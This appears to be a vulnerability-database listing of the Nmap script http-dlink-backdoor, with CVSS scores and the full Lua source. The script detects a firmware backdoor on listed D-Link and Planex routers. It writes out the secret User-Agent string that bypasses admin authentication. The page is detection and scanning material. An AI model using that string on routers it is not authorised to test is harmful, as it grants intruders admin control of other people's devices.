Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nmapPatrik Karlsson <[email protected]>NMAP:HTTP-DLINK-BACKDOOR.NSE
HistoryOct 17, 2013 - 11:41 p.m.

http-dlink-backdoor NSE Script

2013-10-1723:41:12
Patrik Karlsson <[email protected]>
nmap.org
286

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

JSON

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.

The following router models are likely to be vulnerable: DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240

In addition, several Planex routers also appear to use the same firmware: BRL-04UR, BRL-04CW

Reference: <http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/&gt;

Script Arguments

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -sV --script http-dlink-backdoor &lt;target&gt;

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-dlink-backdoor:
|   VULNERABLE:
|   Firmware backdoor in some models of D-Link routers allow for admin password bypass
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
|
|     References:
|_      http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

Requires

description = [[
Detects a firmware backdoor on some D-Link routers by changing the User-Agent
to a "secret" value. Using the "secret" User-Agent bypasses authentication
and allows admin access to the router.

The following router models are likely to be vulnerable: DIR-100, DIR-120,
DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240

In addition, several Planex routers also appear to use the same firmware:
BRL-04UR, BRL-04CW

Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
]]

---
-- @usage
-- nmap -sV --script http-dlink-backdoor <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-dlink-backdoor:
-- |   VULNERABLE:
-- |   Firmware backdoor in some models of D-Link routers allow for admin password bypass
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
-- |
-- |     References:
-- |_      http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
---

author = "Patrik Karlsson <[email protected]>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","vuln"}

local http = require "http"
local shortport = require "shortport"
local string = require "string"
local vulns = require "vulns"

portrule = shortport.http

action = function(host, port)
  local response = http.get(host, port, "/", { redirect_ok = false, no_cache = true })
  local server = response.header and response.header['server'] or ""
  local vuln_table = {
    title = "Firmware backdoor in some models of D-Link routers allow for admin password bypass",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
]],
    references = {
      'http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/',
    }
  }
  if ( response.status == 401 and server:match("^thttpd%-alphanetworks") ) or
    ( response.status == 302 and server:match("^Alpha_webserv") ) then
    response = http.get(host, port, "/", { header = { ["User-Agent"] = "xmlset_roodkcableoj28840ybtide" } })

    if ( response.status == 200 ) then
      vuln_table.state = vulns.STATE.VULN
      local report = vulns.Report:new(SCRIPT_NAME, host, port)
      return report:make_output(vuln_table)
    end
  end
  return
end

Related

nmap 200
nmap
nmap
http-axis2-dir-traversal NSE Script
2011-07-24 21:10:04
omron-info NSE Script
2015-06-01 04:12:02
ncp-enum-users NSE Script
2011-05-28 09:01:31

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

JSON
Related for NMAP:HTTP-DLINK-BACKDOOR.NSE
nmap200